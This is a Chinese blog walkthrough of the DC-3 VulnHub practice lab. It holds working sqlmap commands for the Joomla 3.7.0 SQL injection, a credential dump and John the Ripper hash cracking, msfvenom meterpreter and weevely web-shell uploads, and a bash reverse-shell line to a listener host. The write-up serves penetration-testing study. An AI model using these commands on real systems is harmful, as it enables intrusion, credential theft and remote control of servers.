DC系列靶场---DC 3靶场的渗透测试(一)

最新推荐文章于 2024-08-26 09:55:10 发布
最新推荐文章于 2024-08-26 09:55:10 发布
阅读量833 收藏 8
点赞数 18
分类专栏: DC系列靶场 文章标签: 网络 安全 linux windows 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhouA0221/article/details/140666012
版权

信息收集

Nmap扫描

nmap -sS -sV -T4 -p- -O 172.30.1.142

//-sS  TCP的SYN扫描
//-sV  服务版本检测
//-T4  野蛮的扫描(常用)
//-O   识别操作系统

使用Nmap扫描只看到一个80端口,Apache的2.4.18版本。

http探测

使用Wappalyzer插件可以到这是Joomla的CMS。Joomla!是一套全球知名的内容管理系统(CMS)Joomla的架构基于MVC框架。

JoomScan

介绍一款专门针对Joomla的开源工具JoomScan

JoomScan是一个开源的漏洞扫描器,‌主要用于自动化检测Joomla CMS的安全漏洞,‌以增强Joomla CMS开发的安全性。‌

用法很简单 joomscan 选项 我们可以直接joomscan -u 目标主机

joomscan -u 172.30.1.142

通过扫描我们看到这是Joomla 3.7.0的版本,找到了一个网站管理后台。

漏洞探测及利用

我们可以看看这个Joomla 3.7.0有没有公开漏洞

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

第三个就是Joomla 3.7.0b版本SQL注入的漏洞

SQL注入

什么是SQL注入呢?

SQL注入漏洞:

SQL注入攻击指的是通过构建特殊的SQL输入语句,传入Web应用程序,而这些输入大都是SQL语法里的一些组合,

通过执行SQL语句而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

我们可以进去看看这个漏洞

这里直接是可以看到sqlmap的执行语句,我们可以直接复制,改为目标主机的IP地址就可以。

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

我们看到这个数据库中有个joomladb的数据库

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

我们应该关注users这个表中的数据

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users'  --columns -p list[fullordering]

现在我们看到了中的字段,我们再对字段中的数据进行查询

sqlmap -u "http://172.30.1.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump -p list[fullordering]

我们现在看到了后台管理员用户名还有一段加密的密码。

看一下这段密文是什么加密算法

hashid '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'

解密

John the Ripper是一款开源密码安全审计和密码恢复工具,可用于许多操作系统。

我们使用款开工具进行解密,操作方法。

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > pass.txt

john passwd.txt

先把我们的密文写入一个txt文件中,直接使用john进行破解。

我们已经得到了管理员的后台登录地址,也拿到了用户名和密码。

管理后台:http://172.30.1.142/administrator/

用户名和密码:admin:snoopy

成功登录到后台,这时候的思路就是通过木马上传拿到shell

木马上传

创建木马

方法1:msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.195.77 lport=4444 -f raw -o webshell3.php

在模板里新建PHP文件类型,文件名为webshell3

msf> use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 172.30.1.142

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

访问一下我们上传的木马路径

http://192.168.195.138/templates/beez3/webshell3.php

这样我们就成功拿到shell

方法2:weevely

root@kali3:~# weevely generate xiaofeixia webshell.php

generate            Generate new agent  生成一个代理(木马程序)

weevely http://192.168.195.138/templates/beez3/webshell.php xiaofeixia

成功连上拿到shell

Kali端运行:

nc -lvp 2266 

weevely用户端 bash -c 'bash -i >& /dev/tcp/192.168.195.77/2266 0>&1'  //获得一个交互式shell

白帽子二三
关注
  • 18
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2738
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
DC系列靶场---DC 1靶场渗透测试(一)
zhouA0221的博客
07-17 1276
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
DC系列靶场---DC 9靶场渗透测试
zhouA0221的博客
08-13 1163
先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录。这里我们看到一个password文件,打开之后看到好多个秘密,我把密码放到我们的passwd文件中。
DC系列靶场---DC 7靶场渗透测试
zhouA0221的博客
08-08 1186
通过 Drush,开发者可以在终端中执行常见的 Drupal 操作,如安装、更新、8、邮件通过脚本执行,每15分钟执行一次,把nc的反弹shell写入脚本文件,攻击端侦听,等待目标主机执行脚本。4、通过查看邮件发现使用了drupal中drush程序,这个工具可以更改用户的密码。这个时候要等,因为这个脚本文件是每15分钟执行一次,所以只需要等待就可以。3、在网站中登录发现不行,之前还扫到一个22端口,通过22端口远程登陆上。看到源码中有config的文件,这个肯定是配置文件,可以看一下。
DC系列靶场---DC 5靶场渗透测试
zhouA0221的博客
08-06 1190
DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦。服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,file=footer.php。
DC系列靶场---DC 8靶场渗透测试
zhouA0221的博客
08-09 927
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。nid=3,问号传参,这种URL极有可能存在SQL注入漏洞。初步验证是否有SQL注入漏洞,直接在URL后边加个 ‘ 如果报错那就是被系统执行了,没有进行过滤。5、拿到shell后进行信息收集,Exim这个程序然后搜索这个程序的漏洞。2、通过这个URL加'看看是否报错,如果报错就是被系统执行了,那就是存在。3、拿到用户名和密码之后使用john进行爆破密码,爆出密码后登录到后台。
DC系列靶场---DC 6靶场渗透测试
zhouA0221的博客
08-07 939
使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的。5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码。
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1167
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
DC系列靶场---DC 2靶场渗透测试(二)
zhouA0221的博客
07-22 1355
虽然我们现在已经可以执行切换路径命令了,但是发现还有是很多命令不能用。我想看看一下目标主机的所有用户,是不能执行的。那我们就用到了当前shell逃逸。第一种情况:/ 被允许的情况下;直接 /bin/sh 或 /bin/bash第二种情况:能够设置PATH或SHELL时。现在我们是符合第一种情况的所以我们直接使用/bin/sh 或者 /bin/bash现在我们就可以使用cat命令了,当然其他命令我们也是可以进行执行的。
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1266
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 889
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 439
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
计网面经111
qq_43578042的博客
08-24 170
3、流量控制:TCP使用滑动窗口协议来控制发送方发送数据的速率,接收方会告诉发送方它的缓冲区大小,发送方会根据接收方的缓冲区大小来控制发送速率,确保接收方不会因为太快而丢失数据。2、序列号和确认号:TCP将每个数据段都分配一个序列号和确认号,序列号用于标识数据段的位置,确认号用于确认已经收到的数据段的位置,这样可以避免数据丢失或乱序。通过以上这些机制,TCP保证了数据的可靠传输,但是也会造成一定的延迟,因为数据包需要等待确认和重传,以及滑动窗口和拥塞控制会限制发送速率。
网络编程】第十章 网络层-IP(分片组装+网段+路由+NAT)
YQ20210216的博客
08-22 1259
将目的ip和路由表中子网掩码"按位与"之后得到网络地址,再和Destination比较,两者相等代表当前ip就是需要通过该项路由,此时通过Iface接口发出去,如果和Destination不相等,则继续与下一个子网掩码比较,以此类推,最后由default 默认路由发送出去。传输层一次向下交付的数据太多了会导致分片,数据链路层不支持过大的数据,这就需要在发送方网络层对数据进行分片,分片后的每片都有独立ip,分片会提高丢包的概率,影响传输速率。局域网中主机的私有IP 和 外网当中的某个公网IP之间的映射关系。
计算机网络面试真题总结(四)
最新发布
月伴飞鱼
08-26 390
由于网络的MTU限制,你不能一次性发送整个文件,所以你需要将文件拆分成多个小的数据包进行发送,这就是TCP拆包。UDP不属于连接协议,具有资源消耗少,处理速度快的优点,所以通常音频,视频和普通数据在传送时,使用UDP较多。在传统的HTTP/1.0版本中,每次请求完成后,TCP连接都会被关闭,下次请求需要重新建立连接,这种方式称为。接收端在接收到数据包后,会向发送端确认已接收到的数据包序号,并告诉发送端自己的接收窗口大小。连接的方式,在一次连接上进行多次请求和响应的机制,以提高性能和效率。
华普莱特HDE系列DC-DC电源模块技术规格
"华普莱特HDE系列DC-DC电源模块是北京华普莱特科技发展有限公司推出的大功率模块电源产品,适用于多种电压输入范围,具有高效能、高稳定性的特点。产品手册提供了详细的技术参数和选型指导,包括模块的外形尺寸、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值